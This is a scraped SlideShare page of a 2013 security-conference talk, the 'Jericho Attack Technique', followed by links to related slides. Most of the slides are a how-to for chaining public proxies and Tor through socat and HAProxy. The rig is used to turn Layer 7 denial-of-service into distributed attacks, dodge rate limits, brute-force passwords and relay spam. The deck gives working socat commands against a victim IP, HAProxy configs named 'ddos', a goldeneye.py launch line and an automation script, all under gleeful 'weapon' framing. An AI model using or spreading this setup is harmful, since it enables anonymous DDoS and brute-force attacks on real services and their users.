SlideShare une entreprise Scribd logo
1  sur  57
Télécharger pour lire hors ligne
Jericho Attack TechniqueJericho Attack Technique
Cluster-bombing TCP attacks for maximum impactCluster-bombing TCP attacks for maximum impact
Jan SeidlJan Seidl
jseidl@wroot.orgjseidl@wroot.org
@jseidl@jseidl
$ whoami$ whoami
AboutAbout
Full Name: Jan SeidlFull Name: Jan Seidl
Origin: Rio de Janeiro, RJ – BrazilOrigin: Rio de Janeiro, RJ – Brazil
Work:Work:
●
CTO @ TI SafeCTO @ TI Safe
●
OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash
●
Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl
Features:Features:
●
UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!)
●
Python and C loverPython and C lover
●
Coffee dependentCoffee dependent
●
Hates printers and social networksHates printers and social networks
●
Proud DC Labs ResearcherProud DC Labs Researcher Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
$ whoami$ whoami
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
$ whoami$ whoami
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
STUPID, BROKE, NERD, BROKESTUPID, BROKE, NERD, BROKE
DisclaimerDisclaimer
‘‘Jericho’ is a product from the fictional company ‘StarkJericho’ is a product from the fictional company ‘Stark
Industries’ from “The Iron Man” movie franchise fromIndustries’ from “The Iron Man” movie franchise from
Paramount Pictures and Marvel Studios, as well as anyParamount Pictures and Marvel Studios, as well as any
related picture presented in this presentation.related picture presented in this presentation.
Please do not sue me.Please do not sue me.
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
x00 Overviewx00 Overview
x01 Application / Usesx01 Application / Uses
x02 Required Partsx02 Required Parts
x03 Weapon Assemblyx03 Weapon Assembly
x04 Weapon Tuningx04 Weapon Tuning
x05 Launching the attackx05 Launching the attack
x06 Weapon Maintenancex06 Weapon Maintenance
x07 Escalating Firepowerx07 Escalating Firepower
x08 Turning into a Smart Weaponx08 Turning into a Smart Weapon
x09 Demo!x09 Demo!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
AgendaAgenda
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
The attack consists on utilizingThe attack consists on utilizing public SOCKS proxiespublic SOCKS proxies
andand TOR instancesTOR instances throughthrough socket multiplexingsocket multiplexing
softwaresoftware (e.g.: Load Balancing/Cluster software) as(e.g.: Load Balancing/Cluster software) as
relays for attacks in a load-balancing fashionrelays for attacks in a load-balancing fashion
At a glance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
public SOCKS proxies + TOR instances + socketpublic SOCKS proxies + TOR instances + socket
multiplexing softwaremultiplexing software
At a glance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
At a glance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
Schematics
Attacker
Proxy 1
Proxy 2
Proxy 3
Proxy 4
Proxy 5
Proxy 6
Proxy 7
VictimHAProxy
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
Evading connection and rate limitingEvading connection and rate limiting
Bypassing country/origin restrictionsBypassing country/origin restrictions
Hiding origin of attacks, making forensics people sad :(Hiding origin of attacks, making forensics people sad :(
Low bandwidth attack such as Layer 7 DOS attacksLow bandwidth attack such as Layer 7 DOS attacks
Very efficient for
Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)
http://slidesha.re/14yYiuVhttp://slidesha.re/14yYiuV
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
OverviewOverview
At first HAProxy may seem as a load balancer strictlyAt first HAProxy may seem as a load balancer strictly
for HTTP(S), but it’s not.for HTTP(S), but it’s not.
HAProxy’s actual description is “The Reliable, HighHAProxy’s actual description is “The Reliable, High
PerformancePerformance TCPTCP/HTTP Load Balancer”./HTTP Load Balancer”.
Cool, huh?Cool, huh?
Paying closer attention
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Applications for the Jericho Attack Technique
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Web scraping/spideringWeb scraping/spidering
Limited API requestsLimited API requests
IP-based anti-fraud schemes (eg: Online Voting)IP-based anti-fraud schemes (eg: Online Voting)
User enumerationUser enumeration
Password brute-forcingPassword brute-forcing
Basic multiplexing use
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Making Layer 7 Denial-of-Service attacks intoMaking Layer 7 Denial-of-Service attacks into
distributed configuration (DoS → DdoS)distributed configuration (DoS → DdoS)
(I like this one very much in particular)(I like this one very much in particular)
Hitting hard
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
Multiplexing mail relays for SPAMMultiplexing mail relays for SPAM
Multiplexing and anonymizing backdoor connections /Multiplexing and anonymizing backdoor connections /
commandscommands
Even more? Go crazy!Even more? Go crazy!
Going deeper
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
UsesUses
FTPFTP
SMTP(S) POP3(S) IMAP(S)SMTP(S) POP3(S) IMAP(S)
SSHSSH
RDP / VNCRDP / VNC
MySQLMySQL
many more...many more...
Possibly supported protocols
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Building the weapon
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Main assembly
Socat: Multipurpose RelaySocat: Multipurpose Relay
http://www.dest-unreach.org/socat/http://www.dest-unreach.org/socat/
SSL support:SSL support:
HTTPS, IMAPS, POPS, LDAPSHTTPS, IMAPS, POPS, LDAPS
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Main assembly
HAProxyHAProxy
http://haproxy.1wt.eu/http://haproxy.1wt.eu/
““The Reliable, High Performance TCP/HTTP LoadThe Reliable, High Performance TCP/HTTP Load
Balancer”Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B,REQUEST → HAPROXY → { SERVER A, SERVER B,
SERVER C }SERVER C }
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Resources
SOCKS/HTTP(S) ProxiesSOCKS/HTTP(S) Proxies
http://www.proxynova.com/proxy-server-list/http://www.proxynova.com/proxy-server-list/
http://hidemyass.com/proxy-list/http://hidemyass.com/proxy-list/
Just google it...Just google it...
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Resources
TOR exit nodesTOR exit nodes
PRO TIP: You can run as many TOR tunnels as you want (:PRO TIP: You can run as many TOR tunnels as you want (:
tor --RunAsDaemon 1 --CookieAuthentication 0tor --RunAsDaemon 1 --CookieAuthentication 0
--HashedControlPassword "pwd" --ControlPort 4444 --PidFile--HashedControlPassword "pwd" --ControlPort 4444 --PidFile
torN.pid --SocksPort 9050 --DataDirectory data/torNtorN.pid --SocksPort 9050 --DataDirectory data/torN
Multi-TORMulti-TOR
https://github.com/jseidl/Multi-TOR/https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instancesEX: ./multi-tor.sh 5 # Opens 5 TOR instances
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Important Note
The proxies may or may not require authentication since socatThe proxies may or may not require authentication since socat
supports proxy authentication adding the parameter as follows:supports proxy authentication adding the parameter as follows:
proxyauth=user:passproxyauth=user:pass
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Important Note
Some public proxies append additional headers like X-Forwarded-For thatSome public proxies append additional headers like X-Forwarded-For that
may ruin the whole purpose of utilizing a Jericho attack perspective.may ruin the whole purpose of utilizing a Jericho attack perspective.
(Thanks for Lucas Fernando Amorim for remembering that!)(Thanks for Lucas Fernando Amorim for remembering that!)
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
Important Note
For TOR, one can useFor TOR, one can use two-hop circuits for maximumtwo-hop circuits for maximum
performance and degraded anonymityperformance and degraded anonymity oror greater-hopgreater-hop
circuits for greater anonymity and degraded performancecircuits for greater anonymity and degraded performance..
It just depends on the use.It just depends on the use.
Tor: Four Hops instead of ThreeTor: Four Hops instead of Three
http://coldwaterq.com/?11http://coldwaterq.com/?11
TOR Auto-circuitTOR Auto-circuit
https://thesprawl.org/projects/tor-autocircuit/https://thesprawl.org/projects/tor-autocircuit/
TOR control protocolTOR control protocol
https://thesprawl.org/research/tor-control-protocol/https://thesprawl.org/research/tor-control-protocol/
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Required partsRequired parts
(not so) Important Note
I’ve developed a python tool named (albeit not very creatively)I’ve developed a python tool named (albeit not very creatively) proxygetproxyget..
BeautifulSoup + Mechanize = Smart Scraping!BeautifulSoup + Mechanize = Smart Scraping!
Scripting → HAProxy.conf auto-generation for a Jericho attackScripting → HAProxy.conf auto-generation for a Jericho attack
This tool is yet to be released. Stay tuned!This tool is yet to be released. Stay tuned!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together
Easy simple steps:Easy simple steps:
1. Create lots of socat bindings to the victim, each from a1. Create lots of socat bindings to the victim, each from a
different resource (proxy or TOR instance)different resource (proxy or TOR instance)
2. Configure the locally bound socat ports in HAProxy2. Configure the locally bound socat ports in HAProxy
3. Point victim's DNS name to localhost on /etc/hosts3. Point victim's DNS name to localhost on /etc/hosts
4. Fire at will4. Fire at will
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: socat with proxies
# socat TCP4-LISTEN:80# socat TCP4-LISTEN:80
PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081
PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080
Example:Example:
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: socat with TOR
# socat TCP4­LISTEN:80,fork# socat TCP4­LISTEN:80,fork
SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050
# socat TCP4-LISTEN:8081# socat TCP4-LISTEN:8081
SOCKS4A:localhost:93.184.216.119:80,socksport=9050SOCKS4A:localhost:93.184.216.119:80,socksport=9050
Example:Example:
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: HAProxy
listen ddos 0.0.0.0:80listen ddos 0.0.0.0:80
mode tcpmode tcp
balancebalance roundrobinroundrobin
serverserver inst1 localhost:8080inst1 localhost:8080
serverserver inst2 localhost:8081inst2 localhost:8081
serverserver inst3 localhost:8082inst3 localhost:8082
serverserver inst4 localhost:8083inst4 localhost:8083
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: HAProxy (larger sample)
globalglobal
maxconn 10000maxconn 10000 # set this accordingly to MAX within your kernel socket limits# set this accordingly to MAX within your kernel socket limits
user haproxyuser haproxy
group haproxygroup haproxy
daemondaemon
defaultsdefaults
mode tcpmode tcp
retries 3retries 3
option redispatchoption redispatch
maxconn 20000maxconn 20000 # set accordingly# set accordingly
contimeout 5000contimeout 5000 # set accordingly# set accordingly
clitimeout 50000clitimeout 50000 # set accordingly# set accordingly
srvtimeout 50000srvtimeout 50000 # set accordingly# set accordingly
# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied
sockets.sockets.
listen jericho 0.0.0.0:80listen jericho 0.0.0.0:80 # just a instance name# just a instance name
mode tcpmode tcp
balance roundrobinbalance roundrobin # gives more time within socket/outoging IP reuse# gives more time within socket/outoging IP reuse
server inst1 localhost:8080server inst1 localhost:8080 # SOCKS proxy# SOCKS proxy
server inst2 localhost:9051server inst2 localhost:9051 # TOR instance# TOR instance
server inst3 localhost:9052server inst3 localhost:9052 # TOR instance# TOR instance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Sticking the parts together: /etc/hosts
# Jericho target below this line# Jericho target below this line
# make him suffer (:# make him suffer (:
example.com, www.example.comexample.com, www.example.com 127.0.0.1127.0.0.1
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon AssemblyWeapon Assembly
Ta-da!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon Tuning
Moar firepower!Moar firepower!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon Tuning
About performanceAbout performance
There are several parameters on the linux kernel that can beThere are several parameters on the linux kernel that can be
tuned in order to achieve better TCP performance.tuned in order to achieve better TCP performance.
Because ‘performance’ is relative to the attack being conductedBecause ‘performance’ is relative to the attack being conducted
(you may need more bandwidth or more concurrent connections(you may need more bandwidth or more concurrent connections
or anything else), there are several options that one mustor anything else), there are several options that one must
consider.consider.
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon TuningWeapon Tuning
Linux Tuning ResourcesLinux Tuning Resources
TCP Performance Tuning | SoftpanoramaTCP Performance Tuning | Softpanorama
http://bit.ly/17RiLWvhttp://bit.ly/17RiLWv
Linux Tweaking | Speedguide.netLinux Tweaking | Speedguide.net
http://bit.ly/18JDnlLhttp://bit.ly/18JDnlL
Improving TCP performance over a gigabit network with lots ofImproving TCP performance over a gigabit network with lots of
connections and high traffic of small packets | ServerFaultconnections and high traffic of small packets | ServerFault
http://bit.ly/1fRyjhZhttp://bit.ly/1fRyjhZ
Linux TCP/IP Tuning | LognormalLinux TCP/IP Tuning | Lognormal
http://bit.ly/17Rj8QNhttp://bit.ly/17Rj8QN
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Check that everything is workingCheck that everything is working
You may want to socat resources first to an IP testing website toYou may want to socat resources first to an IP testing website to
verify that Jericho is working successfullyverify that Jericho is working successfully
Then rebind sockets to final destination (victim)Then rebind sockets to final destination (victim)
(don't forget the /etc/hosts entry!)(don't forget the /etc/hosts entry!)
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Fire in the hole!Fire in the hole!
# ./goldeneye.py http://www.example.com/index.php -t# ./goldeneye.py http://www.example.com/index.php -t
1000 -m get1000 -m get
Ahhh... easy and transparent!Ahhh... easy and transparent!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Launching the attackLaunching the attack
Fire in the hole!Fire in the hole!
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Check if your exit proxies are still working and not blockedCheck if your exit proxies are still working and not blocked
Check if your TOR identities aren't blockedCheck if your TOR identities aren't blocked
Gather new proxies and reconfigureGather new proxies and reconfigure
Renew TOR identities (tor_newid.sh, part of Multi-TOR)Renew TOR identities (tor_newid.sh, part of Multi-TOR)
Keeping the blade sharpKeeping the blade sharp
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Weapon MaintenanceWeapon Maintenance
Watchdog daemons / scriptsWatchdog daemons / scripts
Cron jobsCron jobs
Manual checkingManual checking
Keeping the blade sharpKeeping the blade sharp
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Multiple Jericho setups on many hostsMultiple Jericho setups on many hosts
++
Intermediary Forwarder/Multiplexer Jericho node(s)Intermediary Forwarder/Multiplexer Jericho node(s)
++
Multiple or single attack sourcesMultiple or single attack sources
Large-size clustered attack environmentsLarge-size clustered attack environments
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Single-tier cascading Jericho architechtureSingle-tier cascading Jericho architechture
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Multi-tier cascading Jericho architechtureMulti-tier cascading Jericho architechture
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Escalating FirepowerEscalating Firepower
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Initialization SequenceInitialization Sequence
Define Resources
multi-tor.sh
proxyget.py IP PORT
list
TOR socket
list
joinlists.sh jericho.res
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Automatic testingAutomatic testing
testresources.shjericho.res
all resources
valid?
proceed
gather and
revalidate
resources
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Self-configurationSelf-configuration
initjericho.sh
list2socat.sh
list2haproxycfg.sh haproxy.cfg
jericho.res
reload
haproxy
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Full routineFull routine
Initialize Configure Test Run
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
Poor-man's smart JerichoPoor-man's smart Jericho
# Gather proxy list
./proxyget.py --minanon high --minspd medium --type http --quantity 200
> /tmp/proxies
# Parse list
cut -f3,7 -d' ' /tmp/proxies > /tmp/parsedproxy
# Spawn socat entries
./gensocat.sh 93.184.216.119 /tmp/parsedproxy
# Reconfigure haproxy
echo "$HAPROXYCONF_HEAD" > /tmp/haproxy
./genhaproxycfg.sh 200 >> /tmp/haproxy
cp /etc/haproxy/haproxy.cfg /etc/haproxy/haproxy.cfg.old
cp /tmp/haproxy /etc/haproxy/haproxy.cfg
/etc/init.d/haproxy restart
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Turning into a smart weaponTurning into a smart weapon
What else?What else?
Web Interfaces?Web Interfaces?
API?API?
Cloud-hosted?Cloud-hosted?
Quick-deploy packages?Quick-deploy packages?
Jericho-as-a-Service (JaaS)?Jericho-as-a-Service (JaaS)?
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Demo (:Demo (:
Jericho Attack Technique @ YouTubeJericho Attack Technique @ YouTube
http://youtu.be/YRMyW2OA0gIhttp://youtu.be/YRMyW2OA0gI
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Questions?Questions?
Jericho Attack Technique. SEIDL, Jan
ValeSecConf/2013 – São Jose dos Campos, Brazil
Thank you!Thank you!
–– To peace!To peace!
jseidl@wroot.org / @jseidl / http://wroot.org

Contenu connexe

Tendances

BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101Wavestone
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsAleksandr Timorin
 
Root via sms. 4G security assessment
Root via sms. 4G security assessment Root via sms. 4G security assessment
Root via sms. 4G security assessment Sergey Gordeychik
 
Scada Security & Penetration Testing
Scada Security & Penetration TestingScada Security & Penetration Testing
Scada Security & Penetration TestingAhmed Sherif
 
Ceh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networksCeh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networksMehrdad Jingoism
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersAleksandr Timorin
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]RootedCON
 
Droidcon it-2014-marco-grassi-viaforensics
Droidcon it-2014-marco-grassi-viaforensicsDroidcon it-2014-marco-grassi-viaforensics
Droidcon it-2014-marco-grassi-viaforensicsviaForensics
 
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERCODE BLUE
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromPROIDEA
 
Goldfinger presentation rev11
Goldfinger presentation rev11Goldfinger presentation rev11
Goldfinger presentation rev11Allen Taylor
 
Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02
Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02
Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02 Myra Jeannette Fitzgerald
 
David Klein - Defending Against Nation Sate Attackers & Ransomware
David Klein - Defending Against Nation Sate Attackers & RansomwareDavid Klein - Defending Against Nation Sate Attackers & Ransomware
David Klein - Defending Against Nation Sate Attackers & RansomwareCSNP
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardHITCON GIRLS
 
Greater China Cyber Threat Landscape - ISC 2016
Greater China Cyber Threat Landscape - ISC 2016Greater China Cyber Threat Landscape - ISC 2016
Greater China Cyber Threat Landscape - ISC 2016Sergey Gordeychik
 
[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan NovikovOWASP Russia
 

Tendances (17)

BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanisms
 
Root via sms. 4G security assessment
Root via sms. 4G security assessment Root via sms. 4G security assessment
Root via sms. 4G security assessment
 
Scada Security & Penetration Testing
Scada Security & Penetration TestingScada Security & Penetration Testing
Scada Security & Penetration Testing
 
Ceh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networksCeh v8 labs module 15 hacking wireless networks
Ceh v8 labs module 15 hacking wireless networks
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentesters
 
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
Rafa Sánchez & Fran Gomez - IoCker - When IPv6 met malware [rooted2019]
 
Droidcon it-2014-marco-grassi-viaforensics
Droidcon it-2014-marco-grassi-viaforensicsDroidcon it-2014-marco-grassi-viaforensics
Droidcon it-2014-marco-grassi-viaforensics
 
Improving SCADA Security
Improving SCADA SecurityImproving SCADA Security
Improving SCADA Security
 
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVERSCADA Software or Swiss Cheese Software?  by Celil UNUVER
SCADA Software or Swiss Cheese Software?  by Celil UNUVER
 
CONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin NystromCONFidence2015: Real World Threat Hunting - Martin Nystrom
CONFidence2015: Real World Threat Hunting - Martin Nystrom
 
Goldfinger presentation rev11
Goldfinger presentation rev11Goldfinger presentation rev11
Goldfinger presentation rev11
 
Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02
Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02
Multicoreexpo2011 05-05fridiusingtemplate-110518193827-phpapp02
 
David Klein - Defending Against Nation Sate Attackers & Ransomware
David Klein - Defending Against Nation Sate Attackers & RansomwareDavid Klein - Defending Against Nation Sate Attackers & Ransomware
David Klein - Defending Against Nation Sate Attackers & Ransomware
 
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - HowardBirds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
Birds of a Feather 2017: 邀請分享 Glance into the Enterprise InfoSec Field - Howard
 
Greater China Cyber Threat Landscape - ISC 2016
Greater China Cyber Threat Landscape - ISC 2016Greater China Cyber Threat Landscape - ISC 2016
Greater China Cyber Threat Landscape - ISC 2016
 
[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov[2.2] Hacking Internet of Things devices - Ivan Novikov
[2.2] Hacking Internet of Things devices - Ivan Novikov
 

Similaire à Jericho Attack Technique

⛳️ Votre API passe-t-elle le contrôle technique ?
⛳️ Votre API passe-t-elle le contrôle technique ?⛳️ Votre API passe-t-elle le contrôle technique ?
⛳️ Votre API passe-t-elle le contrôle technique ?François-Guillaume Ribreau
 
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por "Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por SegInfo
 
Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...
Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...
Flex and LiveCycle Data Services Best Practices from the Trenches (Adobe MAX ...François Le Droff
 
Open source mobile development solutions
Open source mobile development solutionsOpen source mobile development solutions
Open source mobile development solutionsDaniel Downs
 
Thor - RSLA - 13oct2009
Thor - RSLA - 13oct2009Thor - RSLA - 13oct2009
Thor - RSLA - 13oct2009Plataformatec
 
Let's contribute, HTML5Rocks/ko!
Let's contribute, HTML5Rocks/ko!Let's contribute, HTML5Rocks/ko!
Let's contribute, HTML5Rocks/ko!Chang W. Doh
 
Cr java concept by vikas jagtap
Cr java  concept by vikas jagtapCr java  concept by vikas jagtap
Cr java concept by vikas jagtapVikas Jagtap
 
[RHFSeoul2017]6 Steps to Transform Enterprise Applications
[RHFSeoul2017]6 Steps to Transform Enterprise Applications[RHFSeoul2017]6 Steps to Transform Enterprise Applications
[RHFSeoul2017]6 Steps to Transform Enterprise ApplicationsDaniel Oh
 
CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...
CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...
CommunityOneEast 09 - Dynamic Languages: the next big thing for the JVM or an...Chris Richardson
 
Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...Breaking Extreme Networks WingOS: How to own millions of devices running on A...
Breaking Extreme Networks WingOS: How to own millions of devices running on A...Priyanka Aash
 
" Breaking Extreme Networks WingOS: How to own millions of devices running on...
